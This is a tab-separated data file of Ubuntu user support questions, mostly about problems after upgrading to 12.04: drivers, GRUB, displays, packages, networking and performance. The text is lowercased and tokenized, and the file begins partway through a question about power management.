runtime pm for pci device intel corporation 82801i ( ich9 family ) pci express port 4 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) pci express port 5 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 1 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 2 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) pci express port 2 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) pci express port 3 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 3 bad runtime pm for pci device intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 5 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) pci express port 1 third , about `` power aware cpu scheduler '' , changing cpu policy to powersave does not solve the problem . update 2 using switch 'acpi_osi=linux ' ( as described here ) does not fix the problem . update 3 seems this is not a problem with aspm , as my computer does not seem to support it . if i had pcie_aspm=force to kernel , i 've the following output : $ dmesg | grep aspm [ 0.000000 ] pcie aspm is forcibly enabled [ 0.197865 ] acpi fadt declares the system does n't support pcie aspm , so disable it
133041	is there any advantage in using propietary video drivers over the open source ones ?	i have been using ubuntu as my main os for 3 cycles now , with a radeon hd 4870 video card . in every cycle the open source video drivers were not enough , meaning that something was not working right . weather it was the movies or unity 3d ( compiz cube in the old days ) i always had something which was not working . so i always installed the ati proprietary drivers , thus solving the issues . precise was the first os upgrade i have ever made ( for the old ones i always made a complete new install ) . so , before upgrade , i have uninstalled the ati drivers and reverted to the open source one in order to avoid issues . after the upgrade everything is working as it should with the open source drivers gallium 0.4 . i have all the nice 3d features and full hd movies are running . so , i am really asking myself , if there would be any reason for me to turn back to the propriety drivers from ati ? i mean do you guys know for sure there are some features present that are not in the open source one drivers ? thanks .
133042	how can i disable `` shift + numlock '' from toggling on the mousekeys ?	is there a way to prevent the shortcut key `` shift + numlock '' from toggling on the mousekeys feature ? i ca n't find it under `` system settings > keyboard > shortcuts '' . i am running oneiric / gnome 3
133043	when was a package installed ?	you know the problem : `` i did n't change anything '' but now , it 's broken . is there a way to see when some package was installed or a list of all packages sorted by time ?
133046	can i configure alt-tab to always switch applications ?	i have windows for an editor , a browser , a web application , and a development tool for that browser open . unity groups them as two applications : chrome and eclipse . alt-tab switches application group , alt-` switches windows in the same group . but , if my current window and previous window are from the same application group ( chrome ) , alt-tab switches to the previous window , not to eclipse . how can i configure alt-tab to always switch between application groups , not windows of the same app ?
133058	ubuntu one taking up 40-170 % of cpu usage with i5 processor	i am backing up all of my photos and docs , so i have purchased 160gb of storage . yes , it is a lot of photos ... i am finding that my system is running very slowly while the backups are taking place , and ubuntu one is taking up a massive amount of my cpu time . system monitor is reporting it using 40-170 % of the cpu time . i also ca n't easily view my 'pictures ' folder , i seems to hang for a long time figuring out which folders have/have not been backed up yet ( i guess ) . i am running ubuntu 12.04 lts with all latest patches . i have laptop with a intel i5 processor with 8gb ram . thanks .
133059	installing the numenta platform	i want to install the numenta platform in ubuntu12.4 . it created by python 2.5 and for ubuntu 9.4 . you can see the installing step and requerment in the below link the numenta installing help but in ubuntu 12.4 we have the python 2.7 and upper so when i tried to play the numenta platform faced to this error : importerror : libpython2.5.so.1.0 : can not open shared object file : no such file or directory after i inserted this commands in .bashrc file to change the python path to my platform folder : nta= $ home/nta export path= $ nta/bin : $ path export pythonpath= $ nta/lib/python2.7/site-packages : $ pythonpath but faced to the recent error again . it seems that the platform is using from python2.5 yet . i do n't know how can i run the numenta platform now . thanks for attention .
133060	why ca n't i use my tv as a dual monitor setup ?	im new to ubuntu , and ca n't get it to recognise my sony bravia tv as a monitor . in the displays settings menu , it shows my regular monitor ( 23 '' benq ) as a laptop which concerns me a little , not sure if this is part of the problem . i have a geforce gtx 275 graphics card , with my tv plugged in through the hdmi output . it runs fine in my windows environment thanks
133062	unable to create .zip files or modify .xpi with file roller in oneiric	i 'm trying to modify a firefox plugin in .xpi format using file roller . when i try to resave the file after making modifications , i get an error : 7-zip [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,4 cpus ) scanning updating archive /home/user/desktop/myplugin.xpi system error : e_invalidarg if i try to just save it as a .zip instead , i get this error : an error occurred while adding files to the archive . it works fine in maverick and precise , only my oneiric machine is unable to properly save the file . what steps can i take to find the cause of this problem ?
133073	windows 7 entry missing from grub after 12.04 installation	i 've read several answers to related questions here , but have not found one that matches my situation . i assisted a colleague to reinstall windows 7 from a recovery partition . we then booted into windows , shrank the windows partition ( /dev/sda3 ) and the installed ubuntu 12.04 ( we partitioned the remaining space into / ( sda5 ) , /home ( sda6 ) , /swap ( sda7 ) and free space for another windows drive later . ) i specified grub to install to /dev/sda . /dev/sda1 and /dev/sda2 were recovery/system partitions . after rebooting , grub showed the ubuntu boot options in the menu , and an option for a windows recovery on /dev/sda1 and a similar one for /dev/sda2 . it did not show an entry for windows 7 on /dev/sda3 . i booted into ubuntu and ran sudo update-grub , but this failed to detect windows on /dev/sda3 . i checked the contents of /dev/sda3 and windows is still there . i hope i can resolve this soon , as this is not a good first impression of an lts release to someone who has just decided to start using ubuntu/gnu/linux !
133076	how can i set a display resolution of 1366x768 in a acer aspire one zg5 ?	how can i set a display resolution of 1366x768 in a acer aspire one zg5 within ubuntu 12.04 ? the only resolutions available are 1280x768 and 800x600 .
133077	how to organize scripts and tools under ~/bin in directories , but have them in $ path ?	i always have ~/bin added to the $ path in my ~/.profile . as is default in ubuntu . # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi however , when trying out software , hacking together a script , or testing new software that has no ppa 's , makefiles and such , i prefer to organize them in directories . for example ( i have about twelve of these projects in my ~/bin at this moment ) : ber @ audrey : ~ â ls bin/replicatorg-0033/ contributors.txt examples lib-i686 license.txt readme.txt scripts todo.txt docs lib lib-x86_64 machines replicatorg skein_engines tools this is some java application . replicatorg is the executable . now , i could do four things , but i am looking for another , better way : symlink the exectuable in ~/bin . ln -s bin/replicatorg-0033/replicatorg bin/replicatorg . this sometimes works , not in this case . the application is poorly written and expects libraries relative to its binary : it will not run when symlinked or copied out of its directory . add every subdirectory to $ path as well . but that means editing ~/.profile everytime i move , download or git-clone new directories . install the applications properly systemwide by creating a makefile/install script . seen as that most of the applications are quick hacks , ugly , in development , scripts and tools , that is not a good idea , imho . move all the contents of ~/replicatorg-0033/ into ~/bin . right . so : how do you organize your ~/bin ?
133080	no indicators on the panel in gnome classic ubuntu 12.04	i installed gnome on ubuntu 12.04 and i 'm using gnome classic . problem is i have no indicators on the top right . no power off , battery or anything . how can i get them back ?
133083	how to stop hud from appearing while video playback ?	when i watch a movie in vlc , i want to jump forward or backward in the movie using alt+right/left , but when i press alt the hud appears . is it necessary to change some key bindings ( like shown here ) or is there a better solution ? maybe i can disable hud while having focus on vlc ?
133084	screen tearing ( very noticable during video playback ) with hd3000 and hd radeon 6630m	i did not have this issue with ubuntu 11.10 . well , to be clear , i did , but it was easily remedied with compiz workarounds . i have tried both the propriety and open source ati drivers , and the intel hd 3000 ( as far as i know ) should be part of the kernel already . so i am pretty much 100 % stumped given my general lack of linux knowledge . i really enjoy this os , would hate to have to return to windows ( read : hate ) because of something as trivial as video playback . some details : lenovo thinkpad edge e520 intel hd 3000/amd hd radeon 6630m ubuntu 12.04 64bit .
133085	is the firewall active or not ?	i 'm confused about the status of my firewall . using the ubuntu software center , i have installed gufw . problem : when the firewall is locked , it looks like it 's inactive . but when i unlock it , it 's always shown as active . do i need to leave the firewall gui open all the time in order to enable it ?
133086	bash tab auto-complete not working for apt	apt-get install and apt-cache policy do not complete package names . i have double checked /etc/bash.bashrc , no irregularities . googled for answers but none suffice . any help/advice ?
133091	thinkpad x200t volume mute button not recognised to use as shurtcut	i installed a fresh ubuntu 12.04 on my thinkpad x200t . however , my volume mute button does not work whilst volume up and down buttons work flawlessly . i tried to edit the shortcut key that is assigned to volume mute in the keyboard settings [ 1 ] but the button is not recognised . [ 1 ] http : //imgur.com/c0qef what else can i try ? regards
133092	gnome iii 12.04 draws desktop off top of screen ( overscan )	with native resolution of 1680 x 1050 , nvidia ( post-release update ) ( version current-updates ) driver installed , ( nvidia recommended driver fails to install with bug ) , gnome iii draws the desktop top bar off the top of the screen ( also unity . ) i have to stare at desktop all day , is there a config file that can be edited ? my screen is also detected as laptop , it is a desktop/tower , ( relevant ? ) would a fresh install rectify ? i updated , never had a problem before + migrating files right royal pita . thanks .
133093	ca n't boot ubuntu 12.04 or any other linux distribution on my fujitsu siemens amilo xa 2528	i 've had this problem with another fujitsu siemens computer as well , and i remember once back in the days that i had to inject drivers for some kind of sata controller on my xp disc to be able to reinstall that , so i 'm wondering if this could be related . although the problem i 've had historically with the other fs computer is a little bit different , it always happens in the same place in the boot process . i have no problem choosing usb as the boot option and actually booting , getting to the ubuntu selection menu and all that . it 's when i choose to actually boot that it gets stuck . the same happens with linux mint , where i 've tried the normal variant and the lxde variant on both usb and cd . previously it has gotten stuck at the initramfs prompt , but here 's an image of where it gets stuck now : does anyone have any experience with this and what kind of tweaking needs to be done to get ubuntu to boot ? i 'm even open to hardware tweaking ( i.e . removing some kind of unnecessary controller if any ) . thanks in advance !
133095	what was the default font for ubuntu 11.04 ?	i have installed ubuntu 12.04 on my system.everything is going fine.but i thing i got that it has different font by default.so i want to change it in gedit and terminal from this question.but i want to know which font was installed on ubuntu 11.04 by default.i want that font to be my default font.so can some one tell me what was the default font for ubuntu 11.04 ? any help and suggestions will be highly appreciable.thanks in advance .
133096	grub failure after installing new12.04	lenovo i7 , 64 bit , win7 , 11.10 on sda10 with home on sda8+swap on sda9 . root 12.04 on sda12 with /usr on sda11 complete new . there was kubuntu before with grub , the grub on sda10 didnâ´t work , but all entries have been fine . install of 12.04 ok , but after reboot : file not found , grub rescue promt which even does not accept exit ! after set prefix , set root , insmod comes : invalid arch independent elf magic . this seems to be the real reason . win7 repair finds nothing , parted magic can not install lilo instead , the grub rescue-cd updates grub on sda10-same error , , , but fails to update grub on sda12 ! i tried to start via parted magic but donâ´t know the correct command . i am happy to have not updated , because there seems to be many problems with 12.04 ! if i could boot with grub on sda10 ( old system ) again is enough . but how to do ? marek
133097	how to use remmina or any alternative to connect to windows 7 ?	i 'm new here & i just tried to connect to windows 7 on my laptop from ubuntu 12.04 on my pc . first i tried tsclient but i could n't isntall it on ubuntu 12.04 . then i tried remmina . the problem now is i ca n't use it , i dunno how i should configure it . i tried some ways by myself but they did n't work . is there any guidance about using remmina or anything else which helps me plz ?
133104	how can i browse maildir directories ?	i 've backed up some email accounts ( e.g . gmail ) using getmail . the mails are stored locally using the maildir format . my question is , how can i browse these mails ? preferably i would not have to use dovecot just some kind of local client
133110	how can i customize colors of theme ? ( specifically i want to change the color of tooltip )	i had maverick and i have customized ambiance theme to have light background color for tooltips . but from natty onwards i ca n't see the 'customize ' button anywhere . how can i customize the themes in some user friendly way ?
133111	how can i check if my cpu is amd64 compatible ?	i 'm downloading both versions of ubuntu 12.04 at this moment . i 'd like to install amd64 on my portable , even though it 's an intel machine . is there a website ( or another way ) where i can check compatibility ? acer aspire 5745g-724g50mnks , intel i7 with 4gb ram
133112	nginx does not respond requests for rails app	i try to deploy my app to ec2 son amazon via nginx and passenger . i did what the passenger installation comments say . but when i run my nginx and try to enter my site it does not respond even withan error message . it loops forever . i looked the pstree output for my non-workign nginx : init─┬─passengerwatchd─┬─passengerhelper─┬─ruby─┬─ruby─┬─ruby─┬─ruby─── { ruby } │ │ │ │ │ └─ { ruby } │ │ │ │ └─ { ruby } │ │ │ └─2* [ { ruby } ] │ │ └─27* [ { passengerhelper } ] │ ├─passengerloggin─── { passengerloggin } │ └─3* [ { passengerwatchd } ] ├─acpid ├─atd ├─avahi-daemon───avahi-daemon ├─cron ├─dbus-daemon ├─dhclient3 ├─6* [ getty ] ├─mysqld───17* [ { mysqld } ] ├─nginx───nginx ├─rsyslogd───3* [ { rsyslogd } ] ├─sshd───sshd───sshd───bash───pstree ├─udevd───2* [ udevd ] ├─upstart-socket- ├─upstart-udev-br └─whoopsie─── { whoopsie } also i have nginx in my laptop and it is working fine and it gives this pstree output ( partially ) just after it is got an request : ├─passengerwatchd─┬─passengerhelper─┬─ruby │ │ └─27* [ { passengerhelper } ] │ ├─passengerloggin─── { passengerloggin } │ └─3* [ { passengerwatchd } ] i see that there are some zombie processes on my ec2 instance after an request : what you think about the problem and any suggestion to solve it ? after a wait it gives gateway timeout 504
133113	emulate keypad on laptop	i have a laptop without a numeric keypad on which i 'm running ubuntu 12.04 , and i very much enjoy playing roguelike games . such games tend to require a numpad for movement , targeting , & c. , as one is able to operate in the eight cardinal directions . to get around the limitation of not having a numpad , i would like to be able to bind a key combination , for example shift + left arrow to another key , in this case 1 ; unfortunately , my research so far has only turned up how to bind a key combination to a command . i 'm sure there 's something blaringly obvious that i 'm missing , but as for what it is ... any help would be greatly appreciated !
133114	netbeans is sluggish/unresponsive	on my 64bit ubuntu 12.04 on an intel core i3 processor which has 16gb ram and a m4 ssd , netbeans is very sluggish as well as the known problem where netbeans does not use ubuntu 12.04 's global menu . that problem aside , why is netbeans so slow , it 's even slower than eclipse ! please have a look at this video : http : //youtu.be/utlqd5gpg0m
133115	how to set default unity login screen in ubuntu 12.04 with differant user background screens	installed pangolin 12.04 x64 with 2 users , one user has the default unity login screen with a different user background when logged in . user 2 's unity login screen is the same as there background screen when logged in . i want user 2 to have the unity login screen with a different user set background when logged in . this problem happened directly after installation . have tried ubuntu-tweak and gnome tweak neither resolve the problem . regards ian lester
133122	compass ( ruby ) error on precise	i had compass ( a ruby gem ) installed on oneiric with no problems i have updated to precise formatting / and keeping /home , so i needed to reinstall ruby . i get this error now when i compile a scss file : compass watch -- trace change detected at 12:45:09 to : style.scss overwrite css/style.css dear developers making use of fssm in your projects , fssm is essentially dead at this point . further development will be taking place in the new shared guard/listen project . please let us know if you need help transitioning ! ^_^b - travis tilley compass is polling for changes . press ctrl-c to stop . argumenterror on line [ `` 45 '' ] of /usr/lib/ruby/1.9.1/pathname.rb : invalid byte sequence in us-ascii /usr/lib/ruby/1.9.1/pathname.rb:45 : in chop_basename' /usr/lib/ruby/1.9.1/pathname.rb:101 : incleanpath_aggressive' /usr/lib/ruby/1.9.1/pathname.rb:89 : in cleanpath' /usr/lib/ruby/1.9.1/pathname.rb:451 : inrelative_path_from' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/path.rb:81 : in split_path' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/path.rb:69 : inrun_callback' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/path.rb:55 : in callback_action' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/path.rb:35 : inupdate' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/state/directory.rb:39 : in block in modified' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/state/directory.rb:37 : ineach' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/state/directory.rb:37 : in modified' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/state/directory.rb:18 : inrefresh' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/backends/polling.rb:17 : in block ( 2 levels ) in run' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/backends/polling.rb:17 : ineach' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/backends/polling.rb:17 : in block in run' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/backends/polling.rb:15 : inloop' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/backends/polling.rb:15 : in run' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm/monitor.rb:26 : inrun' /var/lib/gems/1.9.1/gems/fssm-0.2.9/lib/fssm.rb:70 : in monitor' /var/lib/gems/1.9.1/gems/compass-0.12.1/lib/compass/commands/watch_project.rb:87 : inperform' /var/lib/gems/1.9.1/gems/compass-0.12.1/lib/compass/commands/base.rb:18 : in execute' /var/lib/gems/1.9.1/gems/compass-0.12.1/lib/compass/commands/project_base.rb:19 : inexecute' /var/lib/gems/1.9.1/gems/compass-0.12.1/lib/compass/exec/sub_command_ui.rb:43 : in perform ! ' /var/lib/gems/1.9.1/gems/compass-0.12.1/lib/compass/exec/sub_command_ui.rb:15 : inrun ! ' /var/lib/gems/1.9.1/gems/compass-0.12.1/bin/compass:29 : in block in < top ( required ) > ' /var/lib/gems/1.9.1/gems/compass-0.12.1/bin/compass:43 : incall' /var/lib/gems/1.9.1/gems/compass-0.12.1/bin/compass:43 : in < top ( required ) > ' /usr/local/bin/compass:19 : inload' /usr/local/bin/compass:19 : in `' this error does n't appear the first time i make a change to the scss file , but the second . any ideas ? in addition , compass `` eats '' one `` s '' in some files and , instead of compiling them as `` style.css '' ( what it should be from the file 's name ) it does as `` tyle.css '' . edit : i am going to ask this on stackoverflow , since i think the problem is related to ruby itself and not ubuntu .
133124	how do i enable extra visual effects using an intel graphics controller ?	i 'm using an office desktop computer with ubuntu 10.04 installed . i know the intel graphics controller should be able to pull off the simple desktop effects made available by compiz , but i ca n't convince ubuntu to try . when i try to enable extra effects it pops up the `` hardware drivers '' dialog and concludes after a while `` no proprietary drivers are in use on this system '' , with the list below empty . note , i used to have nvidia drivers installed . i moved the ssd from my old computer to this new one . i would like to know what i must learn in order to enable extra effects on ubuntu using intel graphics controller my xorg.conf : ( it 's the default output from $ xorg -configure ) section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` dri2 '' load `` dri '' load `` dbe '' load `` record '' load `` extmod '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' # # # [ arg ] : arg optional # option `` dri '' # [ ] # option `` colorkey '' # # option `` videokey '' # # option `` fallbackdebug '' # [ ] # option `` tiling '' # [ ] # option `` linearframebuffer '' # [ ] # option `` shadow '' # [ ] # option `` swapbufferswait '' # [ ] # option `` xvpreferoverlay '' # [ ] # option `` debugflushbatches '' # [ ] # option `` debugflushcaches '' # [ ] # option `` debugwait '' # [ ] # option `` hotplug '' # [ ] # option `` relaxedfencing '' # [ ] identifier `` card0 '' driver `` intel '' vendorname `` intel corporation '' boardname `` core processor integrated graphics controller '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection $ glxinfo output : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . 3 glxfbconfigs : visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- segmentation fault $ uname -a output : $ uname -a linux tes-ubuntu-w350 3.0.0-19-generic # 33~lucid1-ubuntu smp fri apr 20 13:55 : 08 utc 2012 x86_64 gnu/linux please comment if there is more relevant information i can provide what i have done installed the newest available kernel from apt-get sudo apt-get install linux-image-3.0.0-19-generic linux-headers-3.0.0-19-gener ic added these to my sources deb http : //ppa.launchpad.net/glasen/intel-driver/ubuntu lucid main deb-src http : //ppa.launchpad.net/glasen/intel-driver/ubuntu lucid main and run apt-get update & & apt-get upgrade
133125	how do i find out which software/packages are installed from the date of installation of ubuntu ?	i am about to uninstall ubuntu entirely and reinstall a fresh copy . before i do that i want to make a list of software/package that i have installed so far . any way to list out ? update : the answer by rinzwind shows how to get the list of all the packages from the time when ubuntu came and directly installs the packages if they are not present but i want to get the list only ; not want to install .
133127	how to find what is slow in system and what slows system down ?	i just installed 12.04 and want to try make it work by changing whats slow but 1st i need to find what slows it down but how ? i want see results and be able to compare between versions .
133128	how can i do a clean install ?	my upgrade to 12.04 seems to be slow and there seems to be something that is sapping my system resources . i have no data on the machine - everything is in the cloud including xmarks bookmarks for firefox . is it best to do a clean installation ? if so , how do i do it ? thanks john .
133135	ubuntu 12.04 installer not detecting extra hdd	ubuntu 12.04 installer not detecting extra hdd but the ubuntu 9.04 installer cd does . my system ( x86 ) has two hdd ( 1tb each , independent ) 4g ram . i run ubuntu 11.04 on the one hdd ( sdb ) . had 10.10 running on the other ( sda ) . could always access either sda and sdb by selecting during boot up . both systems were functioning without a problem . formatted sda to change partitions and install ubuntu 12.04 . using a usb stick as installer - not detecting sda ( it does detect sdb ) . successfully installed ubuntu 9.04 on sda after giving up on ubuntu 12.04 . again both drives are working fine . but i still want ubuntu 12.04 on sda . the installer still does not detect sda .
133137	unable to install qt xubutnu 12.04 fresh install	i 've qt sdk which is an offline installer . according to the instructions given for installation , first i have to chmod u+x qt_sdk_offline.run then ./qt_sdk_offline.run but when i do ./qt_sdk_offline.run , it 's saying you do n't have permission .
133139	wubi can not retrieve the required disk image file	i have already downloaded the ubuntu-12.04-wubi-amd64.tar.xz file ... i have no internet connection . when i run wubi , i 'm getting this message : could not retrieve the required disk image file . i used other way..i put ubuntu-12.04-wubi-amd64.tar.xz in ubuntu\disk but it not works.. how can i get the install to work ?
133144	ca n't install gnome-session on lubuntu 12.04	i did a clean install of lubuntu 12.04 and i want to install the gnome3-session i tried sudo apt-get install gnome-session then i logged out . when i login on to the gnome-session iâm still getting the unity-layout . have i done something wrong ? if so what do i need to do to fix it ?
133158	have applications which appear in the featured banner in the software centre paid to be advertised there ?	when looking at the ubuntu software centre i was wondering whether the banner at the top ( which contains featured applications ) contains paid for advertising , or whether they are just recommendations by canonical for useful applications ? i have n't seen anything in the app developers section of the ubuntu website that offers this advertising space for developers .
133160	what does man page for pmap look like on 12.04 ?	i was trying to find out information about pmap this morning , and ran man pmap ... the man page gives me the options for launching pmap , but tells me nothing about how to interpret what i see on the screen when i 've run the program . i would like to report this as a bug in launchpad , but i want to know if this has been fixed in a newer version of ubuntu . i 'm running 10.04 . here 's what i get : name pmap - report memory map of a process synopsis pmap [ -x|-d ] [ -q ] pid ... pmap -v description the pmap command reports the memory map of a process or processes . general options -x extended show the extended format . -d device show the device format . -q quiet do not display some header/footer lines . -v show version displays version of program . see also ps ( 1 ) , pgrep ( 1 ) standards no standards apply , but pmap looks an awful lot like a sunos comâ mand . author albert cahalan < albert @ users.sf.net > wrote pmap in 2002 , and is the current maintainer of the procps collection . please send bug reports to < procps-feedback @ lists.sf.net > . linux october 26 , 2002 pmap ( 1 ) can someone run this on a more modern ubuntu , and see if the man pages have been updated in the last couple of years ? ( i 'm guessing not ... the previous revision was in 2002 , but i still like to cover my bases )
133161	boot screen does not show win xp	today i deleted my mint 11 partitions to create un-allocated space , in which i clean installed ubuntu 12.04 . i originally had windows xp , mint 11 & mint 12 working fine with all three showing up on boot screen . sequence of installs was , xp first followed by mint 11 and lastly mint 12 . on installing mint 12 , booted into mint 11 , used sudo grub-install /dev/sda followed by sudo update-grub . subsequent restart came up with all oss showing on the boot screen . now try as i may , i am unable to get windows xp to show in the boot screen after installing ubuntu . hope someone can help me . all the oss are installed in sda .
133168	i am not able to install ppa 's	sudo add-apt-repository ppa : webupd8team/jupiter traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' )
133170	using pidgin with empathy themes ?	empathy 's `` ubuntu '' theme is quite attractive . is there any way of using empathy themes on pidgin ( specifically the ubuntu theme ) ?
133172	how can i force ssh to give an rsa key instead of ecdsa ?	upon the first time accessing a server , how can i force ssh to give me the rsa key and automatically store it if the user approves ? presently it is offering me the ecdsa key . because i already know the rsa key , i would prefer to see the rsa key presented at this point . i have tried : ssh -o rsaauthentication=yes user @ server unfortunately this gives me an ecdsa key and the are you sure you want to continue connecting ( yes/no ) ? message .
133174	how to play mp3 files using rhythmbox ?	yesterday i just installed the ubuntu 12.04 for the first time , the problem is that i ca n't play and of the mp3 files that i have . i get this error : required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder please help me so i can play the files . thanks
133179	stop ubuntuone-syncdaemon from running in background automatically	is there a way to stop ubuntuone-syncdaemon automatically ( and all other ubuntu one related processes ) from running in the background after i quit the ubuntu one app ? like when you quit dropbox , it will also stop all its syncing processes ? i mean , there should be some simpler ways of doing it rather than killing it manually via terminal or system monitor ?
133181	ubuntu 12.04 x64 - very slow response and sluggishness	recently updated to 12.04 ( 64-bit ) on my amd hex-core 4gb system , over the last few days i feel that the overall system is sluggish/laggy , for instance hitting the dash button , the dash opens but the recent activity of files/videos etc is incredibly slow to populate , like wise in nautilus and browsing my media , the file names are showing up but it takes an age to populate the `` thumb '' of the video , if i go into gnome-shell the shell response is a little faster but again clicking on applications there is still a noticeable pause . i have the latest nvidia drivers loaded and i have very fast sata drives , if i reboot into windows 7 the system is so much quicker in its response , i only use windows for games and ubuntu is my main os . 10.04/10.10/11.04 was super quick and this was when the system still had a dual-core chip and a worse nvidia card , 11.10 was pretty snappy , but 12.04 just feels bloated on each system i have installed it on . my hardware is more than up to the task so has anyone got any commands i can run to help diagnose the issue ? anyone else got the same problems ?
133184	nagios- nrpe installation error ( configure : error : can not find ssl libraries )	i have installed nagios and i want to install nrpe . while installing nrpe , when i execute ( /home/abc/nrpe/configure ) ./configure it stops after reaching the following line ... checking for type of socket size ... size_t checking for ssl headers ... ssl headers found in /usr checking for ssl libraries ... configure : error : can not find ssl libraries i have installed libssl-dev and openssl package as i found them as a solution for this error . i tried the following option also ./configure -- with-ssl=/usr/bin/openssl -- with-ssl-lib=/usr/lib but the error remains . what can be the possible solution for this ? i am using ubuntu 12.04 as my operating system . thanks in advance .
133191	unable to do ./configure during emacs installation	i want to install emacs on my xubuntu 12.04 . so i downloaded the emacs.tar.gz file . i did tar zxf emacs_x.x.x to extract it to a folder . then cd emacs/ then i tried to ./configure . this is not working . i 'm using xubuntu 12.04 fresh installation . please help me solve this problem .
133193	fail to access a windows drive from a live session	i am attempting to use ubuntu to rescue files from a windows pc . i am using ubuntu for the first time , so i am a complete novice . i am asking for assistance to find the files on the pc . i have a windows pc with 2 installed hard disks , 1 is partitioned and includes the c drive . i am able to boot up the pc using ubuntu on a usb stick . the pc will not boot without it as it asks for a boot device . when in ubuntu the only device shown in dash is the floppy drive . in the bios drop down list the hard drive does not show up as a boot option . in terminal having written sudo fdisk -l i get the following : disk /dev/sda:31.9 gb , 31876710400 bytes ... ... ... device boot start end blocks id system /dev/sda1 * 39232 62259199 31109984 c w95 fat32 ( lba ) being a novice , i do not know how to mount the windows partitions c , d and e to be able to see the files i want . using instructions from https : //help.ubuntu.com/community/mountingwindowspartitions i typed in the terminal : sudo mkdir /media/fat_partition sudo mount -t vfat -o defaults , user , exec , uid=1000 , gid=100 , umask=000 /dev/sda1 /media/fat_partition i get the message mount : special device dev/sda1 does not exist . i am following instructions parrot fashion , not understanding what i am doing so if anyone feels they have the answer to this newbie 's question i would be grateful for simple steps . thank you .
133197	windows xp wo n't load boot menu to load ubuntu from usb stick	i have notebook with xp in which the cd drive does not work . i want to try out ubuntu before installing it , so i created a bootable usb stick using the usb installer provided at pendrivelinux.com . i have tried using f12 to go to the boot menu , but the menu refuses to display so that i can continue .
133199	ubuntu 12.04 and now can not get my vpn connection	i just upgraded to ubuntu 12.04 ( 3 days ago ) and before that i had a very stable vpn connection even if 11.10 was less stable but now i can not connect to my vpn account at home and at work either can somebody help please tina
